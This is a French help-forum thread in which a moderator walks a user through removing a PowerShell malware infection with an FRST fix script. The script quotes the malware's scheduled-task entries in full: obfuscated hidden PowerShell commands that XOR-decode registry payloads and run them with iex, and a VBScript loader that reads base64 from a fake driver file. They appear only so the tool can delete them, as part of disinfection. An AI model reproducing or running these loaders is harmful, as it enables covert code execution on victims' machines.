Virus Powershell
Résolubazfile Messages postés 58584 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour à tous,
Je viens solliciter votre car je pense être infecté par le virus Powershell.
J'ai réalisé l'analyse avec FRST et voici les 2 fichiers générés :
https://pjjoint.malekal.com/files.php?id=20230724_j14g8q14r12i8
https://pjjoint.malekal.com/files.php?id=20230724_s6x15q7d6m9
Merci d'avance pour votre aide !
Antoine
Windows / Firefox 115.0
- Virus Powershell
- Virus mcafee - Accueil - Piratage
- Virus powershell - Guide
- Virus facebook demande d'amis - Accueil - Facebook
- Undisclosed-recipients virus - Guide
- Panda anti virus gratuit - Télécharger - Antivirus & Antimalwares
5 réponses
Bonjour.
Les liens des rapports ne sont pas accessibles met-les sur https://security-x.fr/up/ et donne les liens générés.
Tu n'as pas compris, tu m'as renvoyé les liens de PPjoint, tu dois mettre les rapports sur le site que je t'ai indiqué https://security-x.fr/up/, car le site de PPJOINT est hors service.
C'est mieux ;)
Désinstalle WebAdvisor par McAfee c'est un adware.
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela clique avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction ?
Policies: C:\ProgramData\NTUSER.pol: Restriction
Task: {E379535F-1DD6-4BF2-BAF7-59201392FB0C} - System32\Tasks\Microsoft\Windows\Management\Provisioning\7y7iBX\EF433B13-3F17-4ECD-B1F9-15DAAFBFCFD5 => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /c EcHo ieX "iCM ([ScripTBlOCK]::CREAtE([STRING]::JoIN('', ((Get-iTeMPropERtY -PatH 'hklM:\sofTWaRE\ODbc7y7IbXr').'7Y7IBXR0D' | % { [ChAR](`$_ -BXoR 185) }))))" | pOweRShEll -WINDoWSTyle HIdden
Task: {C7A93078-5012-41D8-AC0F-29E10D8C571F} - System32\Tasks\Microsoft\Windows\Management\Provisioning\cA0QP1XjF\38A081D2-25A5-44D3-9848-2E07CA2802A6 => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /C ECHo iex "icm ([SCRipTbLoCk]::cREAtE([StrING]::JoIn('', ((GEt-iteMPROpeRtY -Path 'HKlM:\sofTwarE\mCafEecA0Qp1').'ca0qP1xj' | % { [cHaR](`$_ -Bxor 96) }))))" | pOweRshElL -windoWsTYle hIDdEN
Task: {2BA5920B-BC65-4227-AE98-601F09516032} - System32\Tasks\Microsoft\Windows\Management\Provisioning\f3D6t\C55BCE30-63CB-41D5-8F4F-E09E62453C66 => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /c ecHo Iex "ICm ([scRIpTBloCK]::CREaTe([string]::Join('', ((GeT-ItEmPRoPeRty -Path 'hKlm:\SoFtwARe\sEtUPwYuywf3d6Tu19').'f3d6tu19AO' | % { [chAr](`$_ -bXOR 1) }))))" | POwErShell -WindoWStyLE HidDEN
Task: {0429FF68-A871-4312-A25A-158CD65D469D} - System32\Tasks\Microsoft\Windows\Management\Provisioning\GNsjnZslvx\8853604F-CA95-42B9-932C-4D4B049CC721 => C:\WINDOWS\system32\wscript.exe [200704 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /e:vbscript /b "C:\Windows\System32\WNVGNsjnZ\D1375AA4-1E7F-4702-8D2A-672B0D9C6543" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\lvxxbkExF\1F808FF1-623E-4D87-A80A-FC18203EF67C.sys'), 1896616, 422); $sc2 = [Convert]::FromBase64String($sc (l'élément de données a 101 caractères en plus).
Task: {B4FBEB15-EEEE-4B46-BC8D-C1E6B4C62FA1} - System32\Tasks\Microsoft\Windows\Management\Provisioning\K9Atm\2496A4DA-48ED-48EA-86F0-11C73F39F0AD => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /C eChO iEx "Icm ([SCrIPtBlOcK]::CReAtE([stRING]::JoiN('', ((get-iTeMprOPErTY -PaTh 'Hklm:\softWaRe\nicO MAK comPUtINgK9AtmhMzg').'k9AtMHmZGDX' | % { [ChaR](`$_ -BXor 74) }))))" | pOwERsHEll -wiNdOwstyLE hiDden
Task: {584EF616-AEB2-4EC6-B5B3-BD7423FCB0B4} - System32\Tasks\Microsoft\Windows\Management\Provisioning\KwuYJBzq4\EAA48BF2-CA68-41D0-9736-6A39FE09F99F => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /C ECHo ieX "Icm ([scRiPTbLocK]::crEATe([STrIng]::JOiN('', ((GeT-ItEMPrOPERTy -PaTH 'HkLM:\SOftware\cliENTskwUyJ').'KWUyJbZ' | % { [char](`$_ -BXoR 54) }))))" | POWERSheLl -WiNDowstYlE HiDdEn
Task: {01D70868-E2C8-4A03-ABD2-317408F11735} - System32\Tasks\Microsoft\Windows\Management\Provisioning\WyuyWeV6p\06B6F0D2-15E2-4712-93BD-8B4391C37F9C => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /C ECHO IeX "iCM ([sCRiPTBLoCK]::CrEaTe([strINg]::join('', ((GEt-IteMPRopERty -pAtH 'hKLm:\SoFtWare\setuPwyUYW').'wYUyWeV' | % { [cHAr](`$_ -BxoR 52) }))))" | POwErSHEll -wINDoWSTyle HiDdeN
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe (Pas de fichier)
Task: {C6373D38-CA2F-43FA-B4C3-73D1D12966F8} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog (Pas de fichier)
Task: {7D737064-C993-4358-A079-4B50B664B538} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog (Pas de fichier)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Pas de fichier)
Task: {037E68F7-A80F-4CCB-9520-D9E6A9BD33EF} - \Microsoft\Windows\WindowsUpdate\RUXIM\PLUGScheduler -> Pas de fichier <==== ATTENTION
Task: {BC0A6097-F752-4DF9-A567-0D788B2215D2} - \Microsoft\Windows\Bluetooth\UninstallDeviceTask -> Pas de fichier <==== ATTENTION
Task: {8967D969-B67D-48D8-A591-4B73EE649E3A} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => %ProgramFiles%\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (Pas de fichier)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe (Pas de fichier)
Task: {C6373D38-CA2F-43FA-B4C3-73D1D12966F8} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog (Pas de fichier)
Task: {7D737064-C993-4358-A079-4B50B664B538} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog (Pas de fichier)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Pas de fichier)
Task: {A50561AD-FF2E-4310-A9C0-A51475503533} - System32\Tasks\MSUtilisateur1 => C:\Users\Utilisateur\AppData\Local\NSegw2\NSegw2.exe (Pas de fichier)
Task: {B2E9735D-A7D1-4A7C-B317-3AFDE590FD7D} - System32\Tasks\MSUtilisateur3 => C:\Users\Utilisateur\AppData\Local\NSyas2\NSyas2.exe (Pas de fichier)
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ce rapport fixlog sur https://security-x.fr/up/ puis donne le lien généré par https://security-x.fr/up/ dans ta réponse.
5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT
Merci beaucoup de ta réactivité !
Voici le lien du fixlog : https://up.security-x.fr/file.php?h=R247cb6085c5a0e99f00ffd1cc31b2fb3
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question